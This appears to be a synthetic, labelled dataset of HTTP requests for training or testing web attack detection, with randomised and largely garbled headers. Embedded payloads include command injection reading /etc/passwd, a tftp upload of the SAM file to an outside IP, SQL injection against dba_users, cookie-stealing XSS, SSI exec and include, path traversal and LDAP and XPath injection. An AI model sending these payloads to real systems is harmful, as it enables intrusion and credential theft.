X-Forwarded-For: 162.199.201.1
X-Serial-Number: 48112496441051
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47481
Start - Id: 43040
class: OsCommanding
PUT /osnKMuRUnWrnwc/TI1CzwbQ3NjX/43n55r2trsSE8teHE/aL91FY4@y7/nhPoh.cgi? HTTP/1.0
Content-Length: 212
Content-Language: t2naswth,ane7hN,ciae
Content-Encoding: identity
Content-Location: /oebat1Dd/ajkUqw1/wadwm4/tj8ueu1s.php4
Content-MD5: Y21kYXJhaTRuY2VlbTJuZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 28 Jan 04 12:46:30 UTC
Last-Modified: Fri, 13 Aug 04 05:26:04 CET
Host: www.emmlds.fr
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: iso-8859-4
Accept-Encoding: compress;q=0.1
Accept-Language: usr4eha-o64rG, fi-nhei;q=0.3, hht-A, ootfaonr-tMest, sag-R05n
Cache-Control: no-store
Client-ip: 147.157.247.88
Cookie: DMDfGK4Fub=eWF9n2lx2Y
Cookie2: $Version="540"
Date: Sat, 28 Feb 09 05:15:47 GMT
ETag: "AlUxBRc1lFh7_IbRVoc"
Expect: 100-continue
From: a0ee@enelreh.it
If-Modified-Since: Tue, 22 May 07 22:09:41 GMT
If-Unmodified-Since: Thu, 24 Apr 08 06:09:09 UTC
If-Match: "2kQ@kSxpFdV4@fPXi1x"
If-None-Match: *
If-Range: Thu, 29 Mar 07 08:50:19 UTC
Max-Forwards: 3
Pragma: oioriy='Aea'
Proxy-Authorization: Digest opaque="ais18i"
Authorization: Basic ZHJycXc6d3JhaHI=
Range: -98633,070828-,-9277
Referer: /emlCt/f7josr/ds0reeb/caNieaen/nrh1eOn.shtml
TE: trailers
Trailer: From
User-Agent: Mozilla/2.9 (X11; U; Linux i586 6.5; ev-n4; rv:6.6.7) Gecko/49231672
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: 1.3 7.245.118.66, 7.5 www.sh85n9c.png
Transfer-Encoding: gzip
Upgrade: sin/4.4, nanj/1.1, sfgit/8.7, sxHu/2.0
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 225.126.234.64
X-Serial-Number: 4857297063808
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~

eitehoHlayr=5035&mry=dxnLcDgQobJ&W33Y.7hJcSall=8&orufnhowdm8o=etfupskf&YinmtS=ak&tSh=|    /bin/cat     /etc/passwd%00.html&e9erv=epsniedeleteldC~etiat&Oel_H=q0rnn1.&gorhsF=\tdE-osad=8[4WwEptao

End - Id: 43040
Start - Id: 44105
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .exe? HTTP/1.0
Host: www.iersrted4.st
Connection: close
Accept: audio/basic;q=0.5, image/*;q=0.4
Accept-Charset: utf-8, x-mac-greek;q=0.2
Accept-Encoding: compress, identity;q=0.6, deflate, identity;q=0.3
Accept-Language: ilneeO-zakee;q=0.8, S3eahNby-TKll, z-tauhs, N45nh-ua, hlrrFHne-oBf
Cache-Control: no-cache
Client-ip: 212.7.68.146
Cookie: upr9nlhjo=101;s6=eCa%
Cookie2: $Version="7"
Date: Tue, 23 Oct 07 04:46:00 GMT
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: nvabn6ks@5obcxtres.uk
If-Modified-Since: Thu, 18 May 06 16:15:29 GMT
If-Unmodified-Since: Thu, 27 Jan 05 01:37:53 UTC
If-Match: "Uv1ZNf812leJATaD"
If-None-Match: *
If-Range: *
Max-Forwards: 91
MIME-Version: 4.3
Pragma: cn=aLwhuimn
Proxy-Authorization: NTLM YTlha3RlZjlua29weWVzb2s3MW5yemFoMm5wbk4waVJzZW9ndG4zTGhpOGh0aQ==
Authorization: NTLM aGN6aTVpd3RycnFzdGJvaHN0MnVqc2xpZ25hYWVkZm9saw==
Range: 70-
Referer: http://seao.uk/pwht/4ose7aq/ItNugnt/4fn5/9un4.pdf
TE: deflate
Trailer: Date
User-Agent: Mozilla/6.3 (Windows; U; WinNT 1.4; nS-mo; rv:8.0.5) Gecko/37548195
UA-CPU: x86
UA-Disp: 224,424,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1501x189
Via: 5.3 201.253.147.38, hGpre/8.3 207.50.65.250
Transfer-Encoding: gzip
Upgrade: 8sjta/1.7, OaiEm/9.0
Warning: 552 www.5qeog.tiff "0tt4tuzwrsgn" 
X-Forwarded-For: 194.144.61.158
X-Serial-Number: 008751
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 44105
Start - Id: 39901
class: SSI
GET /h3TohzTSMGt/guxbservices/es_/AixtermUR4BJhttp8JJ/vq.uvoxQilxkR3@/08/soiraAi2Y6xrniikea/hpt9i/cBEkZU.cfm?eBynteeaRin33hn=809&LClbin-B=4358761&tnAn=emcd&nLsDIHv3ulsp=php3e+%5C&qRPO6rwj5rwindow.open=efQLhfnI_ HTTP/1.0
Host: 136.146.73.107
Connection: close
Accept: */*
Accept-Charset: euc-cn, euc-kr;q=0.7, x-mac-roman;q=0.7, x-mac-arabic;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Cookie: i4sbo=hoecub;v;JmHoEU=h(E rstyle;nCe=iennballvts;sTao5Ru=<!--#exec cmd="/bin/ls -l  /home/si/dNt"     -->;drHmnydycas=wh5o
Date: Wed, 19 Mar 08 24:39:55 UTC
From: oDee@ds3n0espnt.gov
Max-Forwards: 88
Proxy-Authorization: Digest opaque="rbggmu2e"
Referer: http://www.imor.de/ugseo/ocno.jpg
User-Agent: Mozilla/9.1 (X11; U; Linux i586 0.5; us-3y; rv:6.5.0) Gecko/14221015
UA-OS: Win95
Via: 8.8 200.207.210.196, HTTP/3.4 www.atii0.shtml
Transfer-Encoding: compress
----: -------------

null

End - Id: 39901
Start - Id: 40793
class: SSI
GET /brWOEmRDOpB8QonW8cIh/qMnc8optxuhomeVHv/ots6enplruinhrddda/t4r9.jpeg?tRfov=40252&cfuoisenfRdAedn=eoHps0y7%286S&rbi9sAt5fpzlna=%3C%21--+%23odbc+++++connect%3D%22lb%2CaR%2Cqtlua%22+++++++statement%3D%22select+*+++from++++uhw%22--%3E&uwindow.open-bbinpP=dVdq%7Enllolc&rsqervaj=-%7E&e7lwrsgeblinnX=yiOdehhsaiDzo&xen7hreeuREai=13665&yutih4=%3Dnb+%5Drimge+nS%24%28%27aadoef&gegkHsPZmetagmg=57&e1Slyi=4&e3ahe8emo7ei=821363197&Ha8eeofB=hperlah HTTP/1.0
Host: www.mistiopaot.de
Connection: ab96
Accept: application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 7aGhcea-i2;q=0.6, sldCYn-en;q=0.0, 1aeeinn-cbeo3, e9-r
Cache-Control: no-cache
Client-ip: 187.102.187.0
Cookie: TGPFbmetai=ocwxitn4onse133lq;Pxesoe8nIlnnE=sEr4@T_txDr;andcWenzdljj=(;tnlsdaq0TlhHjsn=01;qLwY3tc=99;fisS9=6444906
Cookie2: $Version="99"
Date: Wed, 29 Oct 08 13:22:11 CET
ETag: "Mkc9ZM08CabKyv1n"
Expect: nsirg=5AerheO;iropdi=icem1yli
From: iipxpA@IasrDjh.ch
If-Modified-Since: Sat, 10 Oct 09 24:29:06 CET
If-Unmodified-Since: Tue, 14 Feb 06 10:19:59 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0301
MIME-Version: 2.9
Pragma: nnletWa='td2ea'
Proxy-Authorization: Digest username="easT"
Authorization: NTLM Y2lsZW1yb2lpckF0ZWFFUG9FMTY3ZVJkbmk0dGRpYWlkenBzcHJwa3JsYW5l
Range: 6294-616374
Referer: http://www.bunorr38.be/l5ubt29/ap1phatA/2sebog.php3
TE: chunked;q=0.7
Trailer: Max-Forwards
User-Agent: Mozilla/1.3 (Machintosh; U; Mac OS X 2.8; hy-7O; rv:5.2.6) Gecko/85564571
UA-Disp: 5062,338,8
UA-OS: Win98
UA-Pixels: 4833x5333
Via: 4.9 28.139.46.148, HTTP/5.9 254.140.222.244, 9.6 www.nhedl.shtml
Transfer-Encoding: compress
Upgrade: hfheyu/3.0, aae/3.8, rsayt/5.1, moh1r/4.2, ryonhi/6.6
Warning: 512 www.zgaaa4Nn.html "tnlssOrNs" 
X-Serial-Number: 095022921
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40793
Start - Id: 48599
class: XPathInjection
POST /ecy/sb.sydNJwgW_@TOiG6/hteYTtqsf/nyqterobeTc1wtvabar/r4a/tsinyvctiauaohhm/tus/sSExi_4ODmKE6Upa_U2h/s0rlir/sXGv4wxBN./qK68N-ww@riJvrSiJn.jpeg? HTTP/1.0
Content-Length: 240
Content-Language: tle7,navng
Content-Encoding: identity
Content-Location: /xbRctstm/tdrn5/Tnrate.htm
Content-MD5: aGV1aWllcnJmaHJoc2J5eQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 09 May 08 16:32:54 GMT
Last-Modified: Thu, 24 Feb 05 04:51:40 GMT
Host: 193.116.220.100
Connection: keep-alive
Accept: application/postscript;q=0.7, image/*;q=0.9, text/*
Accept-Charset: *
Accept-Encoding: compress, deflate, deflate;q=0.2, identity;q=0.9
Accept-Language: oe-otts;q=0.7, oai-eiannxo, oatT-dtbw
Cache-Control: td3o9ga=zomenoo
Client-ip: 58.151.109.14
Cookie: 2ftpoptwX=htpasslog$Nqb?s8;noNrgle=0drRdRzU3Sv1
Cookie2: $Version="357"
Date: Mon, 09 Mar 09 24:55:04 GMT
ETag: "24798vzil9D39PB9"
Expect: 100-continue
From: LhY2ychA@lseaat.st
If-Modified-Since: Sun, 02 May 10 03:46:53 UTC
If-Unmodified-Since: Wed, 18 Jun 08 09:43:40 GMT
If-Match: *
If-None-Match: "iWTwWoQsVMvsBqR3"
If-Range: "eK7x7COBp1sq9sCZ"
Max-Forwards: 3051
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM bWFlaW9vdWJyb2ZsSXRzWXVtVGJ2ZVhzeXB0dWlpc29zVXlCbGNhbnJtc2dsd3JB
Authorization: Basic bGUxdDpudXpTZnE=
Range: 39-76,5-4266
Referer: http://t3eti9ua.st/kBabcN/Nh5oAyeS/emaaev1.conf
TE: deflate;q=0.4
Trailer: Authorization
User-Agent: Mozilla/6.2 (Windows; U; Windows NT 4.4; m4-aD; rv:1.0.6) Gecko/71536726
UA-CPU: Sparc
UA-Disp: 5404,3137,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 853x5228
Via: idci/6.1 11.161.208.179, FTP/8.6 86.132.221.252, 4.8 www.tdsed.png
Transfer-Encoding: ssflt; sTismql=sxtoa
Upgrade: iroi/0.7, Osior/8.4, 9Ceim/4.8
Warning: 711 www.2azi1lut.css "nhuTpph3osOgtutn" "Sun, 02 Nov 08 07:06:07 CET"
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 4557952
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

alenqe2ee5lat7V=202092&hM=llsu'  or  ney/3gqFtr/child::node()[processing-instruction()=995]   or  'lndt1' ='&Mg9=320906&itMtj=r4Q&;e&tyurtrepuCwdoo=iiuwopt&thwovotesssnh=7504809346&esqrk=85&sAohhsu4e=2470

End - Id: 48599
Start - Id: 36894
class: LdapInjection
GET /tbeytegetsad/De2WRtK-DLR/nDBfLNmYsyk2Px_A38da/uu9/ab2C/WSgrhftpE/xa8mINC6FLMDB@0m/onnyrs4oioeeongnoe/tkvxrD42nLgFDTH/hX10aBuD00pkeg.shtml? HTTP/1.1
Host: www.ecaeaofsa.de
Connection: ehoE
Accept: application/rtf
Accept-Charset: x-mac-korean;q=0.8, windows-1257;q=0.7, cp-932;q=0.5
Accept-Encoding: 
Accept-Language: ig-a0Ze, hes-s1, hafg-ichsk9;q=0.3, cEqn-rn;q=0.6
Cache-Control: min-fresh=26
Cookie: 1eeo8OI1a=dGtxnfAxg1ku;1eodrnyotlB=1708;egstcn=idt7lniihoo0dt |;htmtn1tmeuqleir=)  (   |   (   cn=*o  'brien*   )(mail  =*o  'brien*   )    ;openG-Y=7;do=elruoltg
Cookie2: $Version="7"
Date: Sat, 22 Jul 06 04:20:34 UTC
ETag: W/"SlG8CxVjDmKFv3p"
Expect: 100-continue
If-Modified-Since: Mon, 31 Mar 08 09:17:50 GMT
If-Unmodified-Since: Thu, 18 Nov 04 13:30:52 UTC
If-Match: *
If-None-Match: "QD3rByH@.vz4Ek.pJ"
If-Range: Wed, 12 Mar 08 18:36:52 GMT
Max-Forwards: 67
MIME-Version: 4.3
Pragma: 2gdg=io
Authorization: NTLM MGNyYVR0U2NvYmU4djdhdXV0aW1wbHI4Yzd4ZW1pZVR0ZHhzaXRzZWxoZW9u
Range: 21-,-16,9678-
Referer: http://izaupep.cz/yauooug/oecod/xrem/5dhefob.tiff
TE: gzip;q=0.5,gzip,chunked
Trailer: If-Match
User-Agent: 9B0QVR http://www.uAhcepsu.uk
UA-CPU: Sparc
UA-Color: color32
UA-Pixels: 8595x744
Via: 4.7 88.71.115.38, 5.6 www.htsr37u.css
Transfer-Encoding: gzip
Upgrade: l9ays/7.9, hrhe/4.4, efo/8.5, Nircfm/8.4
Warning: 741 www.mfst.htm "eeuaurentse2" "Wed, 25 Jul 07 20:34:34 GMT"
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36894
Start - Id: 44596
class: OsCommanding
GET /wdukmwIuiaOv3vta/elolo/6_TK5qg/eZfJpnodKS/ifS.tQA_MXOIl1bbC/rqulehxtsr/0e2BsONA5AJDs1fH7/rSsfC.fE/4W/betweensautoexecP%uf.msf?zrt=0062&ktkN=94.122.177.125++++%7C+tftp+-i++206.229.14.74+PUT+sam._ HTTP/1.0
Host: www.gerhg3zsh.uk
Connection: cnsow
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: hbnog-mDL
Cache-Control: no-store
Client-ip: 97.130.78.86
Cookie: hmv3sgeceThac=46;ao=dyopt&otkr-on
Cookie2: $Version="923"
Date: Sun, 22 Nov 09 05:25:33 UTC
ETag: W/"EceresNnukYMbJqcg@"
Expect: 100-continue
From: fn96a@esnteln.biz
If-Modified-Since: Sat, 31 Oct 09 05:38:24 UTC
If-Unmodified-Since: Tue, 04 Nov 08 06:34:13 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 06 Apr 04 14:46:39 GMT
Max-Forwards: 7947
MIME-Version: 1.7
Pragma: dmpst='nohhosV'
Proxy-Authorization: ozleh5 vvuEC=0hotw
Authorization: iendrI etxinE=oeBI
Range: -2578
Referer: /fiui/zscrv9t/rl0ie/eenagt.txt
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.9 (Machintosh; U; PPC Mac OS X 6.5; us-s8; rv:0.3.3) Gecko/87015117
UA-Disp: 0488,6492,16
UA-Color: color32
UA-Pixels: 905x8117
Via: 1.3 www.drhp.htm, 6.8 237.35.251.140
Transfer-Encoding: snj8; nicerN=hnu2rds
Upgrade: irceh/7.1, rtal/2.6, Iaf/5.7
Warning: 163 11.52.180.138 "nstees" "Wed, 05 Apr 06 04:07:30 UTC"
X-Forwarded-For: 84.212.52.145
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44596
Start - Id: 38759
class: LdapInjection
GET /1rmsjo_W/ebF7BZKoGDob-JgGwI/bjoInC.6/ikdlX5d/njrlOJ@1_6kEzO/m9.asp?cPX.Tt.tt6orN=tPjD&emW=saN_U&Noxeolae6mi1eos=mochadN&sipei=8sa&artn3e0shun=eeett++tn8ida%7E%28-ae&BgEnlib=2356970991&neixa=8&uni5t6doneirwgt=esihi5&rrleteetzn=9&clXD4Gn5F.3T=ndt%29%28++++%7C%28oee%3D*%29&3EaEa=etN7ti9etK2ttod4xm&gt=4trmrg6gtie3&60kPF3=tPo HTTP/1.0
Host: 101.61.193.48:01
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 185.134.129.220
Cookie: 4gleyt=704144;dakdLrteierab=tO5
Cookie2: $Version="4"
Date: Sat, 10 Jan 09 15:47:46 UTC
ETag: "b2R@sMIXD.Z0eAZ@-tX"
Expect: twbawrei
From: Dddcd@u4uew8d4.be
If-Modified-Since: Tue, 02 May 06 15:44:31 GMT
If-Unmodified-Since: Sun, 19 Feb 06 14:14:40 GMT
If-Match: *
If-None-Match: *
If-Range: "6X9scFNiq4Uwwz7vtyD"
Max-Forwards: 4
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest nc=d1acEBc7
Authorization: NTLM c3JvdGV1M0UzZVJmMThtYXVBcGxlbmVUbjNOZGR4Zm9oc0Ewc2w=
Range: 66-7077,754235-107,-0401
Referer: /r1eg.asmx
TE: trailers,gzip;q=0.1,trailers
Trailer: Accept
User-Agent: txebihnha (sdv4fa2; vt8GgXGb; ppSLe@EgB@; mv2g4xtB; ekV1Btn)
UA-CPU: Sparc
UA-Disp: 1190,0442,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8698x991
Via: detpfe/3.5 207.75.253.8, 4.9 165.85.232.243:524, dyr/2.9 17.223.153.21
Transfer-Encoding: i6ee
Upgrade: t68we/8.2, stg/0.3, jnds/5.8, yeex/3.7, gdi/4.0
Warning: 623 118.59.242.63:0920 "rowFrsl" 
X-Forwarded-For: 15.223.231.187
X-Serial-Number: 99237184639
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38759
Start - Id: 50074
class: XPathInjection
PUT /sKIsystem9R4YL32Gt5Y/i9e5t4adzhil/epeprF4teobnao/moXsCWvvwwmCL/udwo/nJ/rNo00nh6i7t.7lcNCLez/iNAK8hh9-TlLeSRTiC/cbSw7Bi/ibDGwpZz5wngVC2.dll? HTTP/1.1
Content-Length: 224
Content-Language: f2mehsdr,eni6moz4
Content-Encoding: identity
Content-Location: /awFonui/Zyciqi/e8Umeena.txt
Content-MD5: aDFpc211aHNsaDRhY3N4Zw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 31 Mar 07 17:35:12 CET
Last-Modified: Wed, 10 Mar 04 02:18:00 GMT
Host: www.taca.gov
Connection: close
Accept: image/png, video/mpeg
Accept-Charset: windows-1257, hz-gb-2312, utf-7;q=0.7
Accept-Encoding: deflate
Accept-Language: s-eafi
Cache-Control: paiAtenn=s1
Client-ip: 153.53.54.38
Cookie: Ss=tlsprocessing-instructionpp5@(b;arTgdt2sc=eefbtryTlteae;Ves=shb;oeu=/1i;ms=Em3rer'   or path/child::node()[position()=N]   or     'coa'  =   '
Cookie2: $Version="33"
Date: Mon, 20 Jul 09 07:07:32 GMT
ETag: "4qMoo.KfDXMvE2Ng4J9N"
Expect: 100-continue
From: ltnb@jcopsBeoia.be
If-Modified-Since: Thu, 08 Jan 09 13:44:26 CET
If-Unmodified-Since: Fri, 29 Aug 08 08:51:57 GMT
If-Match: "NLBzPzbZwYYX.xN0"
If-None-Match: "2P98PMFRdNSmdIRxEyCe"
If-Range: Wed, 11 Aug 04 02:31:58 CET
Max-Forwards: 13
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic eWV0cm50d3I6bjRhdGVh
Authorization: Basic Z3JoZXU6NGsxbw==
Range: 261-
Referer: /7idst8ta/Xngsokmy/sbel/heiseLe/a3oz2r.cgi
TE: gzip;q=0.7,trailers,trailers
Trailer: Range
User-Agent: Mozilla/7.5 (Windows; U; Windows NT 8.5; qb-nb; rv:5.1.3) Gecko/04952654
UA-CPU: MIPS
UA-Disp: 520,799,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 254x290
Via: ihd/4.2 www.wmaRiA.tiff:9783
Transfer-Encoding: identity
Upgrade: snw/3.3, igei/8.1, tfs/7.6
Warning: 827 251.29.25.85 "odteiapo" 
X-Forwarded-For: 222.187.69.252
X-Serial-Number: 12208
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

miitnohnl8tcmiw=739393&reM6rxbtas=seU6ie9segs6iJ9e&la7EEwp-zzhtacces=u&85e=Hlitbo&is7zjG=)nchaseob&Ht1y=96097&1lZA=e&rm=8w+&ahno9neteekgCe=-ie&1tre6bavhnposea=7101328&oslhoj8cilsa3=autoexec&eeRxTen=04775&boctvGton7ht6=ig

End - Id: 50074
Start - Id: 35213
class: SqlInjection
GET /tz4/e5/eCeMEX1k9eH.mdb?3andwtRservicesFZ2Achild=P5extteTefd0&set1yeraoa4hi=aMDQ5&homebFLHO=9nc%3F%26edtymU&remse=%28hn&N1=80&eHx=Edh24oeeoeiieH&fBfQnzKr0cmdE=0&hzlgNalmAr=hn09Sglinputizssnfe&_dcatY=execyta&tmasubidiseie=samyseZ&loeqo=atcszdx&smieoMmonehJe=37063&ebso=%3Bin+o&b1seoS=chairs%27+++UN%2F**%2FION+++SEL%2F**%2FECT++jsr6le+++++FROM++dba_users+++WHERE+++++teac+++like+++%27%2525&d2NkEaizGaawt=i7e HTTP/1.0
Host: 15.102.191.28
Connection: fuoow
Accept: text/plain
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: e61A4-tdEkpDEo, guf8x0-Dhnks;q=0.3, bMod-TaIhg;q=0.6, oon-d
Cache-Control: no-cache
Client-ip: 247.223.116.97
Cookie: havingF0MnodeotHSsxJ=792;2srwevg5oh1i=42627
Cookie2: $Version="29"
Date: Fri, 07 Sep 07 19:01:30 UTC
ETag: "osdX6lLH@4A8bU-Sr0"
Expect: duapjRis=awoeo;l1m7=3t6n
From: inoen@aqahlweho.fr
If-Modified-Since: Thu, 17 Jul 08 16:38:32 UTC
If-Unmodified-Since: Fri, 06 Aug 04 01:23:40 GMT
If-Match: "Eq8NSJDwH0wz571XnYqI"
If-None-Match: *
If-Range: Fri, 04 Jan 08 08:25:06 CET
Max-Forwards: 0
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Basic RmVacGU6cmFzQQ==
Authorization: oaihl AEnmn=htiils
Range: -30216,36258-
Referer: http://leetn.cz/Dk2ot83a/gpothvhI/aieIoc8/moer/knroh.tar
TE: trailers,chunked
Trailer: If-Match
User-Agent: nnLM7C5pZ http://www.o5cn.fr
UA-CPU: Sparc
UA-Disp: 3369,6494,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: 2.5 160.198.150.9, s6sIhc/0.6 214.98.136.146
Transfer-Encoding: deflate
Upgrade: satc/9.3, dlwu/4.3, ras/0.6, hmrcOE/0.0
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 123.169.83.240
X-Serial-Number: 653794992925901
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35213
Start - Id: 47663
class: XSS
GET /qratoaebpzahlnwem/eitrknsnwnsd/ccitancoleapNowaw/Wrcp/wEvl0ssbye6oa/rJwZ9Mc/ehacHFa/sov_Ag.xH4BPzZzYwq/fvv4p/eaBnNmurp.shtml?mtn=u8asdhttp7ceve&grSeeaur=1&wTj2_rbBcH=doy%2BshEseepTeP&1oqm7htni0o=haqctnakrcxno&sn=348353&nhTn=7LoRDZl%40etS&NbVaresemus=h-shPpzHlocationiR+Aarh4x4id&au=is%5Daasbeiin%27leleval&a8=uee%7E3k&eueeer=%25%27t&eeenq0=%3Cdiv+style++%3D%22+background-image%3A+++url%28javascript%3A++%5Bwindow.open%28%27http%3A%2F%2F163.222.93.151%2Fes.exe%27%2Bdocument.cookie%29%3B%5D%29%3B%22%3E&9xJPFG4yFslinkH=bo2WYFbEk&osye3a2sb=458&smt=haand%3Adoet83l9cm HTTP/1.1
Host: www.t4lt0toa.fr:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: ea6eab=h
Client-ip: 39.154.184.38
Cookie: Lhea=2438;gyyp7biehlge=Ltwh;mtexs=4163
Cookie2: $Version="8"
Date: Mon, 14 Nov 05 13:32:28 CET
ETag: W/"T6GZychf4Xyzvl1pm"
Expect: 100-continue
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Thu, 25 Oct 07 22:17:01 GMT
If-Unmodified-Since: Tue, 14 Jul 09 20:12:12 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 71
MIME-Version: 7.7
Pragma: liit=zhf0ti3N
Proxy-Authorization: bxdtp1 pwtsrI=RoiSgk
Authorization: NTLM ZWhic244cGh0c29uZVVhdXJ0YWV1UmU1czNoYmQ4dDVHb2E=
Range: 51-,059585-
Referer: http://www.prktfc.gov/mtra/Srib5Sz/uScse/A55azs.js
TE: gzip;q=0.3,chunked;q=0.1,gzip
Trailer: From
User-Agent: Mozilla/7.0 (Machintosh; U; PPC Mac OS X 2.2; io-cd; rv:5.0.7) Gecko/18383838
UA-CPU: 68000
UA-Disp: 434,760,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 7165x674
Via: 2.4 211.31.11.182, 2.6 231.76.26.159:681
Transfer-Encoding: identity
Upgrade: lica5r/6.9
Warning: 036 www.sm7aE.jpeg "OA9la" "Thu, 19 Nov 09 13:07:50 GMT"
X-Forwarded-For: 118.255.6.210
X-Serial-Number: 6943669939
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47663
Start - Id: 39750
class: SSI
GET /41r.php?cecraba=%3C%21--+%23include+virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22++++--%3E&noiva=728&si=eesanyIttnejm&nl8rnt5mLato=%25soAsxdt9&incrditneewsl=ikJ7p&aeal4he=0012&uOYe5UuhYn=0aeeisle4&sebT3iemNayoe=sbpt&uctmgtlt=f7%3Dnl HTTP/1.0
Host: 147.10.254.21
Connection: close
Accept: text/*;q=0.6, video/*;q=0.7
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: erseoonb-sl, phew-f8t;q=0.2, ra8-dnoaef;q=0.1, reilTeco-dHbtiBaf, map-inre;q=0.1
Cache-Control: fgaheoh='wqmco'
Client-ip: 11.1.136.106
Cookie: in=slTO2BVQY2lf;uaokftw2sa=e.bDdC
Cookie2: $Version="7"
Date: Thu, 17 Mar 05 05:36:43 CET
ETag: W/"GkJ_THAtFpr_JVbdPoW"
Expect: 7atT=ybaN
From: n4tbla@ol8e.st
If-Modified-Since: Wed, 10 Sep 08 20:36:41 GMT
If-Unmodified-Since: Fri, 31 Dec 04 10:08:36 CET
If-Match: "hdKwoB-gsr5C2jZDq"
If-None-Match: "Sxgz__kQ-nNDn4X6yIs"
If-Range: *
Max-Forwards: 9
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: reaDt emvtgetu=inssramo
Range: 85-,34121-
Referer: http://aSnfl.de/i0fs.mpeg
TE: trailers
Trailer: Date
User-Agent: lfln4o0o9eYeolttt
UA-CPU: 68000
UA-Disp: 377,8023,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5615x413
Via: 6.4 224.169.35.54
Transfer-Encoding: identity
Upgrade: 2to/5.7, h7i/2.7, ufnrto/8.8, fpto/1.4
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 141.175.190.115
X-Serial-Number: 37299896
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39750
Start - Id: 36132
class: PathTransversal
GET /eJxHLyV5@meCQbrgOK/eloa9tg38e/cC/v2A/dgqd/eSgsl/T.w.kGbgsoundoU4lXs1M/t0mlehiAocts0/EIhIrbotpjtr/ncyo-YP.hF@c9/nYzdH-lognZ.pl?ILinu0=potdaf0i&4dt=%5CWINNT%5Csystem.ini&6wlmbamuetheeag=n%3Doq%5Bu+ldx%25dcpoHexecN%40s&aurtOyC3m4eId=ascripta%5Du%40&Irdyde=includeyevmon HTTP/1.0
Host: 100.219.41.187:7
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=917
Client-ip: 77.156.80.102
Cookie: Ermocha27NNeQcopy=0fGYbn;ic=5
Cookie2: $Version="2"
Date: Thu, 23 Jun 05 15:06:28 GMT
ETag: "lMBZg_LeLLpyz7x8YDp."
Expect: ieg5
From: regt5wfi@r275i.st
If-Modified-Since: Fri, 09 Feb 07 21:31:03 UTC
If-Unmodified-Since: Sat, 10 Oct 09 11:05:22 CET
If-Match: *
If-None-Match: *
If-Range: "LbSd6-.go-bZbqxMu"
Max-Forwards: 51
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: dv2sl edbc=qyempezk
Range: -535722,74763-864722,-62713
Referer: http://eroe7rod.uk/4vcae7e/8eIw/rooe/feiefo5e.pdf
TE: deflate;q=0.7,chunked
Trailer: Proxy-Authorization
User-Agent: amhienoo7itdsajeeHdT
UA-CPU: MIPS
UA-Disp: 0150,960,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 7606x3250
Via: HTTP/7.4 254.203.131.165, HTTP/3.6 www.tqsfSao.gif, 1.4 www.teae.htm
